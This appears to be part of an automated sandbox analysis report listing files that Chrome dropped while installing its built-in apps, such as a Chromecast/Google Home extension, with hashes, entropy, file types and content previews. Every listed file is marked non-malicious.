                                                                                                                                                                                                                        Preview: /*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var b,k=k||{};k.scope={};k.createTemplateTagFirstArg=function(a){return a.raw=a};k.createTemplateTagFirstArgWithRaw=function(a,c){a.raw=c;return a};k.arrayIteratorImpl=function(a){var c=0;return function(){return c<a.length?{done:!1,value:a[c++]}:{done:!0}}};k.arrayIterator=function(a){return{next:k.arrayIteratorImpl(a)}};k.makeIterator=function(a){var c="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return c?c.call(a):k.arrayIterator(a)};.k.arrayFromIterator=function(a){for(var c,d=[];!(c=a.next()).done;)d.push(c.value);return d};k.arrayFromIterable=function(a){return a instanceof Array?a:k.arrayFromIterator(k.makeIterator(a))};k.ASSUME_ES5=!1;k.ASSUME_NO_NATIVE_MAP=!1;k.ASSUME_NO_NATIVE_SET=!1;k.SIMPLE_FROUND_POLYFILL=!1;k.ISOLATE_POLYFILLS=!1;k.FORCE_POLYFILL_PROMISE=!1;k.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.k.objectCreate=k.ASSUME_ES5||"function"==typeof Object.cre
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\css\craw_window.css
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1741
                                                                                                                                                                                                                        Entropy (8bit):4.912380256743454
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:LalZ74H+rMwJHwIodHRmxt3jiu1iu1RDpfeWlMl548wJHwDwCapt/VMYXj8Eq27K:Z+rMm71le88S1tWYXmrVZFH
                                                                                                                                                                                                                        MD5:67BF9AABE17541852F9DDFF8245096CD
                                                                                                                                                                                                                        SHA1:A4AC74DD258E8E0689034FAA1B15A5C7C56DC3BB
                                                                                                                                                                                                                        SHA-256:10DFBD2D98950B79EE12F6B8E3885AABE31543048DE56AD4FC0A5E34D0D9D4EC
                                                                                                                                                                                                                        SHA-512:298FA132C6F122798FDB9BC6DE8024915147ADC20355B56A92F0ED9ACCE4549BE6E7F42212E07DCA166E31624D4E66E299565845D4BA1C51CA935050641B61FE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: html, body {. margin: 0;. overflow: hidden;.}..webview {. width: 100%;. height: 100%;. min-height: 100%;. position: absolute;.}...craw_overlay {. position: absolute;.. left: 0;. top: 0;. right: 0;. bottom: 0;.. background-color: white;.. -webkit-transition: opacity 250ms linear;.. display: -webkit-flex;. -webkit-flex-direction: column;. -webkit-flex: 1 0%;. -webkit-align-items: center;. -webkit-justify-content: center;.. -webkit-app-region: drag;.}...craw_overlay img {. margin: 16px;.}..#loading_overlay {. opacity: 1;.}..#offline_overlay {. opacity: 0;. display: none;.}..#offline_overlay > img {. -webkit-filter: saturate(0%);.}..#offline_overlay > span {. font-family: 'Open Sans', 'Deja Vu Sans', Arial, sans-serif;. font-size: 15px;. line-height: 21px;. color: #8d8d8d;. display: block;.}..#loading_splash {. width: 128px;. height: 128px;.}..#drag_overlay {. position: absolute;. left: 0;. top: 0;. right: 0;. bottom: 0;. pointer-events: none;. -webkit
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\html\craw_window.html
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):810
                                                                                                                                                                                                                        Entropy (8bit):4.723481385335562
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:hYenuEJIig5fRpvV4AEdN2sAAuzg/7RwQuLYpUH9KfRnQBGgZKy3QGgjPSWZDQL:hYeLJKTVNEuLAuzg/twQucpS9bj3
                                                                                                                                                                                                                        MD5:34A839BC40DEBC746BBD181D9EF9310C
                                                                                                                                                                                                                        SHA1:8B4EAA74D31EED5B0BABA3CA5460201F6B10DA46
                                                                                                                                                                                                                        SHA-256:BB8742615E4CD996AE5D0200E443AE6A6F0B473255F03AFFDB8FB4660DE4554D
                                                                                                                                                                                                                        SHA-512:EE81E5509CBC2CB2B6C834224688C1E1B1AA9AA3866C52F8EAED040D5C390653C52D8D681E2E2CF62906643962ABAC823D5B622385B983B21E0DCCAFDF281EFF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: <!DOCTYPE html>.<html>. <head>. <link href="/css/craw_window.css" rel="stylesheet">. <script src="/craw_window.js"></script>. </head>. <body>. <webview></webview>. <div class="craw_overlay" id="loading_overlay">. <img src="/images/icon_128.png" />. <img src="/images/flapper.gif" />. </div>. <div class="craw_overlay" id="offline_overlay">. <img src="/images/icon_128.png" />. <span id="app_unavailable"></span>. <span id="connect_to_network"></span>. </div>. <div id="drag_overlay"></div>. <div id="top_bar">. <div id='close_button'>. <img src='/images/topbar_floating_button_close.png'/>. </div>. <div id='maximize_button'>. <img src='/images/topbar_floating_button_maximize.png'/>. </div>. </div>. </body>.</html>.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\images\flapper.gif
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:GIF image data, version 89a, 30 x 30
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):70364
                                                                                                                                                                                                                        Entropy (8bit):7.119902236613185
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:g5TXOSBAqNIPmA8NcjCWdM0VFMJEwavTeElfWupav5TXg7wV+irIPny9MTVQHydi:g5KSmiIPmAhZWiMsDfWug7DmqM6HybkF
                                                                                                                                                                                                                        MD5:398ABB308EEBC355DA70BCE907B22E29
                                                                                                                                                                                                                        SHA1:CFFB77B8A1724B8F81D98C6D6AD0071D10162252
                                                                                                                                                                                                                        SHA-256:2B73533F47A99FFEA9CC405FFAFA9C4C53623F62487AEBFBA415945120B22040
                                                                                                                                                                                                                        SHA-512:FC7A56FC8A61A582161874B54ADBAD30A84840190008EDB0B6FBF84F91393CA58E988E3FE446F11A0C3C691C18249B93AEC2904B3D0C4F0857D79034F662385A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: GIF89a.......................................................!.......!..NETSCAPE2.0.....,.............9.:.h0.bT(6.!l.&..("g*k..JL1.[....o. .(:..B(.6."...Z.CUyh0.....j.C.z8..S....2.T'...Q..4 g|]$ueW.NyQ.IoL!AoF#9h>7.0t..%..,.@.m4..7..!.......,.............9.:.h0.bT(6.!l.&..("g*k..JL1.[....o. .(:..B(.6."...Z.CUyh0.....j.C.z8..S....2.T'...Q..4 g|]$ueW.NyQ.IoL!AoF#9h>7.0t..%..,.@.m4..7..!.......,............................................................................................................'..w=.....\.)._6.k..OF...n.#\~"....2b3..I.)..eu.Q.`.e......gr.?>.s.I0.....@.~.Tr.[8.+.,.;..EE....S.*f.....,.....B8/D..;.9.q......ukC...r.I.....j......BGY...o2J....+O4....X4.....cH%7....I.....0H!.!.....!.,.............................................................................................................................................................................................................p8.a$....hh@.4....X,A.0L..(....JX.j...,..........z.X.Q....jB.d....B..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\images\icon_128.png
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4364
                                                                                                                                                                                                                        Entropy (8bit):7.915848007375225
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:YjlLDJjTvXUtNvX8dgb9HT6y8nviyHG5iCRYtIP:YtNTfUzvX8KM+MGRsIP
                                                                                                                                                                                                                        MD5:4DBC9F9E6F5A08D299BAC9E54DF07694
                                                                                                                                                                                                                        SHA1:BB38F5DE34B1E0BE1109220BA55271087A4D9EA5
                                                                                                                                                                                                                        SHA-256:91C2718DD23B4356D71F88F6146868369033291086DF327534546DFA459BEB0E
                                                                                                                                                                                                                        SHA-512:A5F2B1F47502836130D8083F757B7773C1E1CB36B76AD298CC29AB2B428C8002D2F15BD839838FC326DAC3681C2F48AB25A3E7631D33726C4B25E8EC14170912
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .PNG........IHDR..............>a.....IDATx..yp.....gF#.:,[H.l.l..8...`/.k....,!a7Km...E...Te..T.....J...p....%.(....+...3....eY.e...L.o...5....h4...\....{?....~.u.`0.....`0.....`0.....`.Y......[(.......).4....ai..w38.+....Bf././..]...{......8...3.....3W~OJ.. /...u6V.C..U.0.+._=.c..9.X.?....L....S@.L...m.0..>.C...L|TF.p5..f4M.,.V....8..a.<...RP..@)E,..E"...h.....!...-....,I..T..........m..._[[{w{{....{*.^......M.x..h4.h.....\.R.E....j).7.....h4.A.E....,. ...iii.Vj?2...=/.B.FK9P..@)=Rj..D".Y...2.B..x.}0...&J...2.......f.O..e.H.....!.J)'I..R....B............QJ;K..L...L.l".L~mhh.R.@).FFF~.L&...~.B.......u.........}.....~.....f..yUU...........^M...6......].,w.e..~.!$.C.R.....E(%e9.,....k..@...W8.........@...........O..@%.~..@.S..P.....`Tp...."...?ME..c......s...`..S1...7.b..aNE..k...3.yP.}.Ch.}......B..........IPE..C.<....T....k......Z..o_......g........P..A=y.J.)h..@.q.-.*].AU.4...F.M.....y%B]+ .\.~..9......:..=...r.....E].o...F..P........i...|....
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\images\icon_16.png
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):558
                                                                                                                                                                                                                        Entropy (8bit):7.505638146035601
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:6v/7vyVgSKYsfFzXxXsrPfA+b0YX+5IOUWCQKznuow7:6yVnKYsfFzhXsrIq0YXmgQGn6
                                                                                                                                                                                                                        MD5:FB9C46EA81AD3E456D90D58697C12C06
                                                                                                                                                                                                                        SHA1:5FC450F7D73CCFAC8F0D818CB3392BA4D91B69DE
                                                                                                                                                                                                                        SHA-256:016CA659BA080E194FBFC0929602B16506ED60AA6019FAA51410C4FD93B583E8
                                                                                                                                                                                                                        SHA-512:ADD810EE9EB7CAEC505B5FD90A1F184CE39D8F8C689DCC240F188FE353B9575489492E07D572A3B1C11A1555CE66AFCA5134903E4C1AA3D54BC7C5ED3E65B50C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .PNG........IHDR................a....IDAT8...Mk.Q...;... .....F..QW.....F....J.?.w..7~......'.Q..B]... .QS...M&_w..b&.|`......p...f.?.D$.y^..........y*...\..Z..t6..oRj.@&.u..G.qN).t.-V*.>(.N.Ep]wFk.60o.]0.`Y..cT..Y.Tb.`DF.d..s.Z..E..9.4._C.._...%..*.^....4.l...Y..X..R..../...Wj+w0[.].._B.k.${.\.>.%...........lz .w.ALxo.2;..a...".p..S..&..uXS...<..6..[..zD.._.N+w.WbM7ye6X<...'(,=.r}........$f..5..P....k..."..8.s.<zgSm@.....).Y.....:e..|.....F...I..A$.....T?.....m....8.........N...z.....V..vd.h'....C.?.....H.;]..C.M.....9.b......IEND.B`.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\images\topbar_floating_button.png
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):160
                                                                                                                                                                                                                        Entropy (8bit):5.475799237015411
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtnAkx/RPJDmV7bScsP4a9zln94FptVp:6v/lhPKM4nDspnAkZJNmgPdln2TTp
                                                                                                                                                                                                                        MD5:8803665A6328D23CC1014A7B0E9BE295
                                                                                                                                                                                                                        SHA1:9DA6EE729D5A6E9F30658B8EC954710F107A641F
                                                                                                                                                                                                                        SHA-256:D5F9234DC36E7FFA85F35B2359A4F82276F8395EFA76E4553507EA990B27FC6C
                                                                                                                                                                                                                        SHA-512:ECD9E71B8BA1ED8BD4CA5A0936CB66A83611C4ABCBDA76C250F4CDF4AD80320212E8F5EEB79A38910718F8346ECC1AD580A3FA835EC2B22BE497F36899FB5930
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...Q..0......2...(p...~Z.}'.>I%O...V!s..................../...`.<..`.....IEND.B`.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\images\topbar_floating_button_close.png
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):252
                                                                                                                                                                                                                        Entropy (8bit):6.512071394066515
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:6v/lhPKM4nDsp7q1hKVlomsj9rxKNgtmN0VZ+GFYep:6v/7iMXVq1ylxemNgtmKVnYM
                                                                                                                                                                                                                        MD5:0599DFD9107C7647F27E69331B0A7D75
                                                                                                                                                                                                                        SHA1:3198C0A5F34DB67F91A0035DBC297354CBC95525
                                                                                                                                                                                                                        SHA-256:131817CD9311C03DF22D769DD2AD7FA2E6E9558863A89F7E5E1657424031A937
                                                                                                                                                                                                                        SHA-512:0076ACB9D6A886BD987876E49495038F9388B292A9EFE5C9093CCA64CA3692E3A5D24E35172C7697F6AAE34B86CA217EE59C003423E46D9499BD27EC7D77A649
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...... ..Pp.X....H...b@...|.^LC_.E.BP+......X.P..........q..~..p/. ..s.....%D^...$......@.!...<...).?.4{.k.G3...4..[cH..0..l.8.!r..m.R..{..........`.f...#.x.....IEND.B`.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\images\topbar_floating_button_hover.png
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):160
                                                                                                                                                                                                                        Entropy (8bit):5.423186859407619
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtnAkx/9lVtEHxrPLyN+ltNPhv/l2up:6v/lhPKM4nDspnAkZHVtERrPLygltNPn
                                                                                                                                                                                                                        MD5:7CB6B9DC1A30F63B8BD976924B75AD96
                                                                                                                                                                                                                        SHA1:0C40B0C496D2F2B5F2021C117EC8610AC03AB469
                                                                                                                                                                                                                        SHA-256:721B7AAA9A42A54A349881615A12E3A26983ACA48E173FD2F66E66AA0D725735
                                                                                                                                                                                                                        SHA-512:4764937364E355956B242B84010AC56102536D2AACBE4227F0E88E4DE7AB468571957EA6C33012539156E5349AE4F777115615AE3361F60ADDF9CD227424F76A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...A..0...+B.z.s...*.....$.<u..[...................h.......C.CA).....IEND.B`.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\images\topbar_floating_button_maximize.png
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):166
                                                                                                                                                                                                                        Entropy (8bit):5.8155898293424775
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZttd//HmnFz1P/ZjXlUTqyCIc30ItK1p:6v/lhPKM4nDsptF/HOP/ZjXlUeyCo/p
                                                                                                                                                                                                                        MD5:232CE72808B60CBE0F4FA788A76523DF
                                                                                                                                                                                                                        SHA1:721A9C98C835D2CD734153BBE07833C6637ECD68
                                                                                                                                                                                                                        SHA-256:AFA4EA944CBDEC8543242E627EF46D5BFD3766DCAC664E7E50CDEEF2B352740C
                                                                                                                                                                                                                        SHA-512:4048EEA5A78DD569521C488C4CE4F7B77AC0454C92EE9107A81A1B3AF91A4EE036039AC1A0A6B8DD26B12E7F1595DB80B7FAA7B6A25D9032BF385528A81A8654
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...HIDATx......0.CQS.......~..."..........m.v+Sq....<!...M8m...'...@$..0....E........IEND.B`.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\images\topbar_floating_button_pressed.png
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):160
                                                                                                                                                                                                                        Entropy (8bit):5.46068685940762
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtnAkx/9lVtEXIyN+ltN1/lsg1p:6v/lhPKM4nDspnAkZHVtEZgltN1eup
                                                                                                                                                                                                                        MD5:E0862317407F2D54C85E12945799413B
                                                                                                                                                                                                                        SHA1:FA557F8F761A04C41C9A4BA81994E43C6C275DBB
                                                                                                                                                                                                                        SHA-256:5C10CE0589EB115600F77381130B70AE0B7B3752614D86D4C89E857658AA222B
                                                                                                                                                                                                                        SHA-512:07CB69327961FD0019BEF8EF7590B5524905AC373A815F73F6D9E0B26840929F919A96CAA977D4B5656704DACD0F352D568FB3997F80EE6BB94C95B58839DBFE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...A..0...+B..@wu...*.....$.<u..[...................h.........M..x(....IEND.B`.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1513086365\CRX_INSTALL\manifest.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1322
                                                                                                                                                                                                                        Entropy (8bit):5.449026004350873
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:1HEis7ViC/yox/fiqeUoLFlmF1s80FKrGfd0d3NZNZx1Fq7eY7nfj1B:WL7V2opiV1mvs8rxTZRczhB
                                                                                                                                                                                                                        MD5:01334FB9D092AF2AA46C4185E405C627
                                                                                                                                                                                                                        SHA1:47AD3C0E82362FFE5B881DF8D71D6F79AB7F5796
                                                                                                                                                                                                                        SHA-256:F52714812D68C577A445169D11E84DF6751C2D6886BC429643072BB5D61C6C27
                                                                                                                                                                                                                        SHA-512:888D96ADB7A847ABE472145258C8C46950EB2FA3BA7D596C2E90A17C8FB06FD0155C56CC8ABA5D076D89368417464BCB2D236F9E40E53241950A01F9F8ED548F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "app": {.. "background": {.. "scripts": [ "craw_background.js" ].. }.. },.. "default_locale": "en",.. "description": "__MSG_APP_DESCRIPTION__",.. "display_in_launcher": false,.. "display_in_new_tab_page": false,.. "icons": {.. "128": "images/icon_128.png",.. "16": "images/icon_16.png".. },.. "key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrKfMnLqViEyokd1wk57FxJtW2XXpGXzIHBzv9vQI/01UsuP0IV5/lj0wx7zJ/xcibUgDeIxobvv9XD+zO1MdjMWuqJFcKuSS4Suqkje6u+pMrTSGOSHq1bmBVh0kpToN8YoJs/P/yrRd7FEtAXTaFTGxQL4C385MeXSjaQfiRiQIDAQAB",.. "manifest_version": 2,.. "minimum_chrome_version": "29",.. "name": "__MSG_APP_NAME__",.. "oauth2": {.. "auto_approve": true,.. "client_id": "203784468217.apps.googleusercontent.com",.. "scopes": [ "https://www.googleapis.com/auth/sierra", "https://www.googleapis.com/auth/sierrasandbox", "https://www.googleapis.com/auth/chromewebstore", "https://www.googleapis.com/auth/chromewebstore.readonly" ].. },.
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\560c3c5f-35c2-4968-b922-58652e03e960.tmp
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):768843
                                                                                                                                                                                                                        Entropy (8bit):7.992932603402907
                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                        SSDEEP:12288:cK2ED9wjXNC1Gse83ru82/u0eKhgxuPFrDXgtbPz54Pm1D0fBmfH1sBrJ9mTiDga:cK2ED9I48seur0/uZKCuPNbgtbz6m1ob
                                                                                                                                                                                                                        MD5:A11D5CAF6BF849AEB84B0C95B1C3B7CF
                                                                                                                                                                                                                        SHA1:27F410CCBD75852C01C7464A1FD7EF8C29BE3916
                                                                                                                                                                                                                        SHA-256:D0E62ACE64AFC334330A7AC3A2CC657914FEB321F1F89AEE11D2A6D0E7D81C31
                                                                                                                                                                                                                        SHA-512:086C124DE3A01BE467647F3BCB4EA05105F690AB45417A0E3D38935ABA9E2381DF59AF98D0FFF7823CEFD5390B48807352E135AC70977AED7B413A8CC48FB590
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........6W..>Nuw9..R{c...Nq.H.K..A!....`v.k+..?.5.>v.....;.._~....tp....x.q.V...7.m.O.~.{!.o/q.'..BK..4./?'.....L..fH&.._<..&.p.k^..\s...:1y..F.N.+...X.PO@Mo....X.G1:..Y.@;..j..........=ae...0.......DU....n...n.;.Ipr..Q....:... <.....a.Y....{ei........0..0...*.H............0.......Mbh=.[O}.+..U.KHF(n3.\"...,g.c...6)..(.E...U...#.i.a..:...N.....P...x.O...(mC;|.5.S.{m.aEx...[..fP.i`.y..5..R....v.$......l-m.............m....ni...`..W.....R.p.b.+...+.\k.R$e~.J\.&c%.d...M..j..V.%...+1F....D....X\.1ct.<........E.B.+.i@...8..^...&YR...I.o...,.....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. D.'.N@.(..GK....m...A.0.."
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\am\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):17307
                                                                                                                                                                                                                        Entropy (8bit):5.461848619761356
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:arfbEVrFvMP4rMhuDopC3vUuFBYZV6uml:aHEVrFvMP4KuFvr6D6uml
                                                                                                                                                                                                                        MD5:26330929DF0ED4E86F06C00C03F07CE3
                                                                                                                                                                                                                        SHA1:478F3B7E7A7E007BEE182B89C2EF6FFE6045E92C
                                                                                                                                                                                                                        SHA-256:621B5139ED199022BB6529AF18ED4DC312AE9F3E90ECAF3B2C9E1D12114F5B22
                                                                                                                                                                                                                        SHA-512:0BE6183A1BF12575C0F99960705D4249E79CDB8528C55FF132BE99A111F09494231AD6A36CD61B090A3B34C6971D68A29373BA346888E852C52E05DC14380682
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": ".....".. },.. "1213957982723875920": {.. "message": "...... ... ..... .. ...... .... ... .... ......?".. },.. "128276876460319075": {.. "message": "..... ...".. },.. "1428448869078126731": {.. "message": ".... ......".. },.. "1522140683318860351": {.. "message": "..... ....... .... ..... .....".. },.. "1550904064710828958": {.. "message": "....".. },.. "1636686747687494376": {.. "message": "... ...".. },.. "1802762746589457177": {.. "message": "...".. },.. "1850397500312020388": {.. "message": ".$START_LINK$Google Home .......$END_LINK$ ... ...... Chromecast ..... .....? $START_SPAN$*$END_SPAN$",.. "placeholde
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\ar\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16809
                                                                                                                                                                                                                        Entropy (8bit):5.458147730761559
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:0IprKC78JmUjk8RkeryFOYPATxLZ8fsbE3/IFV6c8TEKdl:Jrp8JjA8RkerK0lc3wFV6uml
                                                                                                                                                                                                                        MD5:44325A88063573A4C77F6EF943B0FC3E
                                                                                                                                                                                                                        SHA1:78908D766F3E7A0E4545E7BD823C8ED47C7164EB
                                                                                                                                                                                                                        SHA-256:67A439A08804EF4BEF261BDBADD8F0FEFD51729167D01EDCA99DD4AF57D6108B
                                                                                                                                                                                                                        SHA-512:889C02BC986794C58C76022E78F57F867DD1D5217687F12D679A33A2DB9E5A18F3A37CF94D8FE4585E747C78E4662EAB93361FF7D945990774C7CFCACCFB79D1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": ".....".. },.. "1213957982723875920": {.. "message": ".. .. ........ ....... .... .... ... .......".. },.. "128276876460319075": {.. "message": "...... .......".. },.. "1428448869078126731": {.. "message": "..... .......".. },.. "1522140683318860351": {.. "message": "..... ........ .... ........ ... .....".. },.. "1550904064710828958": {.. "message": "...".. },.. "1636686747687494376": {.. "message": "......".. },.. "1802762746589457177": {.. "message": "..... .....".. },.. "1850397500312020388": {.. "message": "... ....... .. .... Chromecast .. $START_LINK$..... Google Home$END_LINK$. $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\bg\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):18086
                                                                                                                                                                                                                        Entropy (8bit):5.408731329060678
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:4jjpr342SIwPIasR9VhMkACVmrv8evj+3eXivOMbb2vVzCkwRV6V6c8TEKdl:4ZrYo+rxT+qOV6V6uml
                                                                                                                                                                                                                        MD5:6911CE87E8C47223F33BEF9488272E40
                                                                                                                                                                                                                        SHA1:980398F076BB7D451B18D7FDE2DE09041B1F55AD
                                                                                                                                                                                                                        SHA-256:273DEF0F67F0FA080802B85EF6F334DE50A19408F46BDF41F0F099B1F5501EEA
                                                                                                                                                                                                                        SHA-512:CDB69405BB553E46DCF02F71B1A394307D0051E7FA662DFFEBA7888F30DD933F13C7FD6E32F1D7AEAEE8746316873B6E1D92029724ABDC75E49DCC092172EA22
                                                                                                                                                                                                                        Malicious:false
